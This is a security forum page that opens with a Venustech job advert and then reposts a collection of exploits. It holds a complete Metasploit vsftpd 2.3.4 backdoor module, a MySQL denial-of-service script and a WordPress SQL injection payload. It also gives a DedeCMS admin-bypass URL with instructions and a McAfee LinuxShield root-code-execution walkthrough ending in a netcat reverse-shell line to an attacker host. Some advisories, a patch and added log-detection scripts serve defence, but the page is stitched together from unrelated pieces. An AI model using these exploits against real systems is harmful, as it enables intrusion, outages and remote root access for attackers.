
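[Recruitment] [Hiring] Venustech (启明星辰) R&D hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2 years or more
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: recruit or job-hunt through the 非安全中国 administrators, QQ group: 57116771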


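  • ++++++++++ Notes on Venustech ++++++++++

    Just send me a private message on this site.

    I. R&D Center: Linux C software engineer (several openings)

    Responsibilities:

    1. Software development and maintenance for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming

    2. Skilled with the Linux operating system; proficient in C programming on Linux

    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with routers, switches, firewalls and other security devices

    5. Familiar with the Linux kernel and its development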

    II. R&D Center: Test engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products

    2. Writing, executing and revising product test cases

    3. Product performance testing

    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge

    2. Solid data-communications fundamentals

    3. Some grounding in Linux

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test-case design, system testing and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent or IXIA testers

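    III. R&D Center: Security event engineer (several openings)

    Responsibilities:

    1. Delivery of trojan detection services and web vulnerability scanning services

    2. Technical support for service customers

    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar topics

    4. Routine updates and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products

    5. Research on attack techniques, on the TCP/IP protocols, and on reverse engineering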

     


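    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's personal opinion and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the 《关于版权及免责声明》 (Copyright and Disclaimer Notice) and enjoys the corresponding rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Part of this post is reposted from other media and published on this site in order to pass on more information; this does not mean that this site endorses its views or is responsible for its authenticity;
    5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
    6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.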

    VSFTPD v2.3.4 Backdoor command execution vulnerability
    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # If port 6200 already answers, the backdoor listener is already running
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        # The backdoor is triggered by a user name that ends in ":)"
        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        # Confirm that the service on port 6200 behaves like a shell
        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow.
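
Added example (not part of the original post or of Metasploit): the module leaves two network artefacts a defender can look for, a `USER` name carrying `:)` sent to port 21 and a follow-up connection to port 6200 on the same server. The Python below flags both in a constructed sensor log; the line format `epoch src dst dport data`, the 30-second window and matching `:)` anywhere in the name are assumptions made here.

```python
from collections import namedtuple

Event = namedtuple("Event", "ts src dst dport data")
Finding = namedtuple("Finding", "server client user shell_port_hit")

FTP_PORT = 21
BACKDOOR_PORT = 6200  # port the module connects to after sending the trigger

# Constructed sample data: "epoch src dst dport data" (hypothetical sensor format).
SAMPLE_LOG = """\
1309564800 198.51.100.7 192.0.2.10 21 USER alice
1309564801 198.51.100.7 192.0.2.10 21 PASS secret
1309564900 203.0.113.5 192.0.2.10 21 USER x7Qa:)
1309564901 203.0.113.5 192.0.2.10 21 PASS zz
1309564902 203.0.113.5 192.0.2.10 6200 id
1309565000 203.0.113.8 192.0.2.20 21 USER bob:)
"""


def parse_events(text):
    """Turn log lines into Event tuples, skipping lines that do not parse."""
    events = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 4 or not (parts[0].isdigit() and parts[3].isdigit()):
            continue
        data = parts[4] if len(parts) == 5 else ""
        events.append(Event(int(parts[0]), parts[1], parts[2], int(parts[3]), data))
    return events


def find_backdoor_triggers(events, window=30):
    """Report every FTP USER command containing ':)' and whether a connection
    to port 6200 on the same server followed within `window` seconds."""
    findings = []
    for ev in events:
        if ev.dport != FTP_PORT:
            continue
        verb, _, arg = ev.data.partition(" ")
        if verb.upper() != "USER" or ":)" not in arg:
            continue
        shell_hit = any(
            other.dst == ev.dst
            and other.dport == BACKDOOR_PORT
            and 0 <= other.ts - ev.ts <= window
            for other in events
        )
        findings.append(Finding(ev.dst, ev.src, arg.strip(), shell_hit))
    return findings


if __name__ == "__main__":
    for f in find_backdoor_triggers(parse_events(SAMPLE_LOG)):
        state = "port 6200 contacted" if f.shell_port_hit else "no port 6200 traffic seen"
        print(f"{f.server}: trigger from {f.client} (USER {f.user}), {state}")
```

A finding with `shell_port_hit` set means the server answered on the backdoor port and should be treated as compromised; a finding without it is still a probe worth blocking.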

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability
    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
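
Added example (not part of the advisory or of the plugin): a log check for the request shape described above. It reads web-server access-log lines and reports requests to `wp-admin/admin.php` with `page=el_admin_main` whose `id` is not a plain integer. The Combined Log Format sample lines and the function name are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, Combined Log Format style).
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Jun/2017:10:00:00 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=12 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jun/2017:10:00:05 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1%20AND%20SLEEP(10) HTTP/1.1" 200 5120
198.51.100.9 - - [10/Jun/2017:10:01:00 +0000] "GET /wp-admin/admin.php?page=other_plugin&id=abc HTTP/1.1" 200 100
198.51.100.9 - - [10/Jun/2017:10:02:00 +0000] "GET /blog/wp-admin/admin.php?page=el_admin_main&action=edit&id=7+OR+1 HTTP/1.1" 200 100
"""

# Client address, then the request target inside the quoted request line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def non_numeric_event_ids(log_text):
    """Return (client, decoded id) for Event List admin requests whose id
    parameter is anything other than decimal digits."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page") != ["el_admin_main"]:
            continue  # a different admin page; its id parameter is out of scope
        for value in params.get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in non_numeric_event_ids(SAMPLE_ACCESS_LOG):
        print(f"{client}: non-numeric id sent to el_admin_main: {value!r}")
```

The same digits-only rule is what the plugin's input handling should have enforced before the value reached a query.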

    MySQL 5.5.8 remote denial-of-service vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()


    Installing Linux step by step: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCMS (织梦) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA value and you get straight into the site's admin back end.

    This vulnerability can only be exploited if the admin path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
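
Added example (not DedeCMS code and not from the original post): a Python model of the two PHP checks above, showing why a name such as `_POST[GLOBALS][cfg_dbhost]` passes the original loop and is stopped by `CheckRequest()`. The function names, the simplified model of PHP's bracket parsing (it does not handle `a[]` appends) and the placeholder query values are assumptions of this illustration.

```python
import re
from urllib.parse import parse_qsl

BLOCKED = re.compile(r"^(cfg_|GLOBALS)")  # same pattern as the PHP preg_match

# Constructed query with the same parameter shape as the request above;
# the host name and other values are placeholders.
SAMPLE_QUERY = (
    "dopost=login&validate=XXXX&userid=admin"
    "&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
)


def php_style_request(query):
    """Simplified model of how PHP turns a[b][c]=v names into nested arrays."""
    request = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        # "a[b][c]" -> ["a", "b", "c"]
        path = [name.split("[", 1)[0]] + re.findall(r"\[([^\]]*)\]", name)
        node = request
        for key in path[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[path[-1]] = value
    return request


def old_check_blocks(request):
    """Original loop: tests only the top-level names of $_REQUEST."""
    return any(len(k) > 0 and BLOCKED.search(k) is not None for k in request)


def patched_check_blocks(val):
    """CheckRequest(): recurses into arrays and tests every key and every value."""
    if isinstance(val, dict):
        return any(
            patched_check_blocks(k) or patched_check_blocks(v)
            for k, v in val.items()
        )
    return len(val) > 0 and BLOCKED.search(val) is not None


if __name__ == "__main__":
    req = php_style_request(SAMPLE_QUERY)
    print("top-level names :", sorted(req))            # only "_POST" is visible here
    print("old check blocks:", old_check_blocks(req))
    print("new check blocks:", patched_check_blocks(req))
```

Because the patched function also tests values, a harmless field whose value starts with `cfg_` or `GLOBALS` is rejected as well, which is a side effect to expect after applying the fix.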

    Installing Linux step by step: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow attackers to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause denial of service.
    1) An error in session handling in django.contrib.sessions when a cache backend is used can be exploited to manipulate session information. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates that a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it tries to verify and resolve the supplied URL. By default the underlying socket has no timeout, so an attacker can exploit this by sending a specially crafted URL that consumes all server memory, causing a denial of service.
    3) An error in handling redirect responses when verifying URLs supplied to the "URLField" field type lets an attacker return a redirect response pointing to a "file://" URL, which can be used to determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses can be exploited for cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-based
    systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can log in to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---


    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz


    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007


    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory